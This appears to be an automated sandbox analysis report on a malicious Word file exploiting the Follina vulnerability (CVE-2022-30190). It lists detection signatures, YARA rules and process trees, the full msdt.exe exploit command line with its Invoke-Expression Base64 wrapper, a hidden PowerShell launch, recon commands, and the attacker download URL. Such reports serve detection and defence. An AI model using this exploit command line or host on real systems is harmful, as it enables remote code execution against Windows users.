
Windows Analysis Report
WF0SlQWKr1.docx

Overview

General Information

Sample Name: WF0SlQWKr1.docx
Analysis ID: 648583
MD5: 783f850d06c9f1286eb9b1bda0af0bce
SHA1: 08011884c9bed126b4cfbadad4a4be5063805230
SHA256: 211a1f74eea68ebe7178d90f0df0446a87cdda865145c397b7a32e253086139e
Tags: CVE-2022-30190, docx, Follina

Detection

Follina CVE-2022-30190
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
Queries memory information (via WMI often done to detect virtual machines)
Suspicious powershell command line found
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Uses ipconfig to lookup or modify the Windows network settings
Document exploit detected (process start blacklist hit)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Internet Provider seen in connection with other malware
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file does not import any functions
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Contains capabilities to detect virtual machines
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Classification

  • System is w10x64
  • WINWORD.EXE (PID: 6400 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)
    • MSOSYNC.EXE (PID: 6548 cmdline: C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe MD5: EA19F4A0D18162BE3A0C8DAD249ADE8C)
    • msdt.exe (PID: 7052 cmdline: C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'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'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
  • csc.exe (PID: 6732 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qghxibcc\qghxibcc.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
    • cvtres.exe (PID: 6940 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESAD7B.tmp" "c:\Users\user\AppData\Local\Temp\qghxibcc\CSC6B59943BD49B40F0B0C17D73652F0B2.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • csc.exe (PID: 5856 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\53i2jeo5\53i2jeo5.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
    • cvtres.exe (PID: 5972 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC028.tmp" "c:\Users\user\AppData\Local\Temp\53i2jeo5\CSCF157ADCDF084F15A343B1EBC149E5EE.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • powershell.exe (PID: 1320 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Unrestricted -File C:/Windows/Temp/5db65c7.ps1 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
    • conhost.exe (PID: 1292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • ipconfig.exe (PID: 4712 cmdline: "C:\Windows\system32\ipconfig.exe" /all MD5: B0C7423D02A007461C850CD0DFE09318)
  • csc.exe (PID: 6272 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\05d3mwhu\05d3mwhu.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
    • cvtres.exe (PID: 7124 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES753.tmp" "c:\Users\user\AppData\Local\Temp\05d3mwhu\CSC34F94DCCCDC94BCAA3A860A33C1ABBE2.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • cleanup
No configs have been found
Source: document.xml.rels | Rule: INDICATOR_OLE_RemoteTemplate | Description: Detects XML relations where an OLE object is referencing an external target in dropper OOXML documents | Author: ditekSHen
  • 0x38a:$olerel: relationships/oleObject
  • 0x3a3:$target1: Target="http
  • 0x3df:$mode: TargetMode="External
Source: sslproxydump.pcap | Rule: JoeSecurity_Follina | Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Author: Joe Security
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\microsoft[1].htm | Rule: SUSP_obfuscated_JS_obfuscatorio | Description: Detect JS obfuscation done by the js obfuscator (often malicious) | Author: @imp0rtp3
  • 0x1aad:$c8: while(!![])
  • 0x1acc:$d1: parseInt(_0x178349(0x197))/0x1*(parseInt(_0x178349(0x19b))/0x2)+-parseInt(_0x178349(0x198))/0x3+-parseInt(_0x178349(0x195))/0x4*(parseInt(_0x178349(0x19e))/0x5)+-parseInt(_0x178349(0x199))/0x6+
  • 0x1aec:$d1: parseInt(_0x178349(0x19b))/0x2)+-parseInt(_0x178349(0x198))/0x3+-parseInt(_0x178349(0x195))/0x4*(parseInt(_0x178349(0x19e))/0x5)+-parseInt(_0x178349(0x199))/0x6+parseInt(_0x178349(0x194))/0x7*(-
  • 0x1b0d:$d1: parseInt(_0x178349(0x198))/0x3+-parseInt(_0x178349(0x195))/0x4*(parseInt(_0x178349(0x19e))/0x5)+-parseInt(_0x178349(0x199))/0x6+parseInt(_0x178349(0x194))/0x7*(-parseInt(_0x178349(0x19c))/0x8)+-
  • 0x1b2d:$d1: parseInt(_0x178349(0x195))/0x4*(parseInt(_0x178349(0x19e))/0x5)+-parseInt(_0x178349(0x199))/0x6+parseInt(_0x178349(0x194))/0x7*(-parseInt(_0x178349(0x19c))/0x8)+-parseInt(_0x178349(0x196))/0x9+
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\microsoft[1].htm | Rule: JoeSecurity_Follina | Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Author: Joe Security
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\14E38085.htm | Rule: SUSP_obfuscated_JS_obfuscatorio | Description: Detect JS obfuscation done by the js obfuscator (often malicious) | Author: @imp0rtp3
  • 0x1aad:$c8: while(!![])
  • 0x1acc:$d1: parseInt(_0x178349(0x197))/0x1*(parseInt(_0x178349(0x19b))/0x2)+-parseInt(_0x178349(0x198))/0x3+-parseInt(_0x178349(0x195))/0x4*(parseInt(_0x178349(0x19e))/0x5)+-parseInt(_0x178349(0x199))/0x6+
  • 0x1aec:$d1: parseInt(_0x178349(0x19b))/0x2)+-parseInt(_0x178349(0x198))/0x3+-parseInt(_0x178349(0x195))/0x4*(parseInt(_0x178349(0x19e))/0x5)+-parseInt(_0x178349(0x199))/0x6+parseInt(_0x178349(0x194))/0x7*(-
  • 0x1b0d:$d1: parseInt(_0x178349(0x198))/0x3+-parseInt(_0x178349(0x195))/0x4*(parseInt(_0x178349(0x19e))/0x5)+-parseInt(_0x178349(0x199))/0x6+parseInt(_0x178349(0x194))/0x7*(-parseInt(_0x178349(0x19c))/0x8)+-
  • 0x1b2d:$d1: parseInt(_0x178349(0x195))/0x4*(parseInt(_0x178349(0x19e))/0x5)+-parseInt(_0x178349(0x199))/0x6+parseInt(_0x178349(0x194))/0x7*(-parseInt(_0x178349(0x19c))/0x8)+-parseInt(_0x178349(0x196))/0x9+
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\14E38085.htm | Rule: JoeSecurity_Follina | Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Author: Joe Security
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\7BB121F.htm | Rule: SUSP_obfuscated_JS_obfuscatorio | Description: Detect JS obfuscation done by the js obfuscator (often malicious) | Author: @imp0rtp3
  • 0x1aad:$c8: while(!![])
  • 0x1acc:$d1: parseInt(_0x178349(0x197))/0x1*(parseInt(_0x178349(0x19b))/0x2)+-parseInt(_0x178349(0x198))/0x3+-parseInt(_0x178349(0x195))/0x4*(parseInt(_0x178349(0x19e))/0x5)+-parseInt(_0x178349(0x199))/0x6+
  • 0x1aec:$d1: parseInt(_0x178349(0x19b))/0x2)+-parseInt(_0x178349(0x198))/0x3+-parseInt(_0x178349(0x195))/0x4*(parseInt(_0x178349(0x19e))/0x5)+-parseInt(_0x178349(0x199))/0x6+parseInt(_0x178349(0x194))/0x7*(-
  • 0x1b0d:$d1: parseInt(_0x178349(0x198))/0x3+-parseInt(_0x178349(0x195))/0x4*(parseInt(_0x178349(0x19e))/0x5)+-parseInt(_0x178349(0x199))/0x6+parseInt(_0x178349(0x194))/0x7*(-parseInt(_0x178349(0x19c))/0x8)+-
  • 0x1b2d:$d1: parseInt(_0x178349(0x195))/0x4*(parseInt(_0x178349(0x19e))/0x5)+-parseInt(_0x178349(0x199))/0x6+parseInt(_0x178349(0x194))/0x7*(-parseInt(_0x178349(0x19c))/0x8)+-parseInt(_0x178349(0x196))/0x9+
Source: 00000007.00000002.527146475.0000000000810000.00000004.00000020.00020000.00000000.sdmp | Rule: SUSP_PS1_Msdt_Execution_May22 | Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation | Author: Nasreddine Bencherchali, Christian Burkard
  • 0x1cec:$a: PCWDiagnostic
  • 0x3c5b:$a: PCWDiagnostic
  • 0x52ae:$a: PCWDiagnostic
  • 0x1c84:$sa1: msdt.exe
  • 0x1cc0:$sa1: msdt.exe
  • 0x2512:$sa1: msdt.exe
  • 0x3c45:$sa1: msdt.exe
  • 0x5b64:$sa1: msdt.exe
  • 0x1d92:$sb3: IT_BrowseForFile=
  • 0x3cae:$sb3: IT_BrowseForFile=
Source: 00000007.00000002.527146475.0000000000810000.00000004.00000020.00020000.00000000.sdmp | Rule: JoeSecurity_Follina | Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Author: Joe Security
Source: 00000007.00000002.530154315.0000000000930000.00000004.00000020.00020000.00000000.sdmp | Rule: SUSP_PS1_Msdt_Execution_May22 | Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation | Author: Nasreddine Bencherchali, Christian Burkard
  • 0x2338:$a: PCWDiagnostic
  • 0x22d0:$sa1: msdt.exe
  • 0x230c:$sa1: msdt.exe
  • 0x2b5e:$sa1: msdt.exe
  • 0x23de:$sb3: IT_BrowseForFile=
Source: 00000007.00000002.530154315.0000000000930000.00000004.00000020.00020000.00000000.sdmp | Rule: JoeSecurity_Follina | Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Author: Joe Security
Source: 00000007.00000002.527356593.0000000000818000.00000004.00000020.00020000.00000000.sdmp | Rule: SUSP_PS1_Msdt_Execution_May22 | Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation | Author: Nasreddine Bencherchali, Christian Burkard
  • 0xad86:$a: PCWDiagnostic
  • 0x167a4:$a: PCWDiagnostic
  • 0x228e2:$a: PCWDiagnostic
  • 0x3090:$sa1: msdt.exe
  • 0x6900:$sa1: msdt.exe
  • 0x190a6:$sa1: msdt.exe
  • 0x228b8:$sa1: msdt.exe
  • 0x22986:$sb3: IT_BrowseForFile=
  • 0x2314a:$sb3: IT_BrowseForFile=
Source: amsi32_1320.amsi.csv | Rule: Recon_Commands_Windows_Gen1 | Description: Detects a set of reconnaissance commands on Windows systems | Author: Florian Roth
  • 0xf88:$s1: netstat -an
  • 0xe57:$s2: net view
  • 0xfdf:$s3: net user
  • 0xfb7:$s20: arp -a
No Sigma rule has matched
Timestamp: 06/20/22-08:29:56.120422
Source IP: 116.203.251.9
Destination IP: 192.168.2.3
Source Port: 443
Destination Port: 49745
SID: 2025011
Protocol: TCP
Classtype: A Network Trojan was detected

AV Detection

Source: WF0SlQWKr1.docx | Virustotal: Detection: 20%
Source: https://upgrade.4nmn.com/microsoft.html | Avira URL Cloud: Label: phishing
Source: upgrade.4nmn.com | Virustotal: Detection: 5%
Source: https://upgrade.4nmn.com/microsoft.html | Virustotal: Detection: 6%

Exploits

Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: 00000007.00000002.527146475.0000000000810000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.530154315.0000000000930000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.527356593.0000000000818000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.530232079.0000000000CA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\microsoft[1].htm, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\14E38085.htm, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\7BB121F.htm, type: DROPPED
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | File opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: unknown | HTTPS traffic detected: 116.203.251.9:443 -> 192.168.2.3:49734 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 116.203.251.9:443 -> 192.168.2.3:49745 version: TLS 1.2

Software Vulnerabilities

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | Process created: C:\Windows\SysWOW64\msdt.exe
Source: global traffic | DNS query: name: upgrade.4nmn.com
Source: global traffic | TCP traffic: 192.168.2.3:49734 -> 116.203.251.9:443
Source: global traffic | TCP traffic: 192.168.2.3:49734 -> 116.203.251.9:443
Source: winword.exe | Memory has grown: Private usage: 0MB later: 77MB

Networking

Source: Traffic | Snort IDS: 2025011 ET TROJAN Powershell commands sent B64 2 116.203.251.9:443 -> 192.168.2.3:49745
Source: Joe Sandbox View | ASN Name: HETZNER-ASDE HETZNER-ASDE
Source: Joe Sandbox View | JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic | HTTP traffic detected: GET /microsoft.html HTTP/1.1 | Accept: */* | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16) | Accept-Encoding: gzip, deflate | Host: upgrade.4nmn.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /microsoft.html HTTP/1.1 | Accept: */* | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16) | Accept-Encoding: gzip, deflate | Host: upgrade.4nmn.com | If-Modified-Since: Sat, 18 Jun 2022 06:13:07 GMT | If-None-Match: "b0474a7ada82d81:0" | Connection: Keep-Alive
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown | Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown | Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown | Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown | Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown | Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49745
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: http://b.c2r.ts.cdn.office.net/pr
Source: powershell.exe, 00000019.00000003.457391782.0000000003539000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000019.00000003.452506340.0000000003539000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://addinslicensing.store.office.com/apps/remove
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://api.aadrm.com
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://api.aadrm.com/
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://api.addins.store.office.com/addinstemplate
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://api.addins.store.office.com/app/query
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://api.cortana.ai
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://api.diagnostics.office.com
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://api.diagnosticssdf.office.com
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://api.diagnosticssdf.office.com/v2/feedback
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://api.diagnosticssdf.office.com/v2/file
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://api.microsoftstream.com/api/
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://api.office.net
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://api.onedrive.com
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://apis.live.net/v5.0/
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://augloop.office.com
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://augloop.office.com/v2
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://autodiscover-s.outlook.com/
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://cdn.entity.
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://clients.config.office.net/
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://config.edge.skype.com
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://cortana.ai
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://cortana.ai/api
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://cr.office.com
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://dataservice.o365filtering.com
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://dataservice.o365filtering.com/
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://dev.cortana.ai
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://devnull.onenote.com
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://directory.services.
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://edu-mathreco-prod.trafficmanager.net
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://edu-mathsolver-prod.trafficmanager.net
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://enrichment.osi.office.net/
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
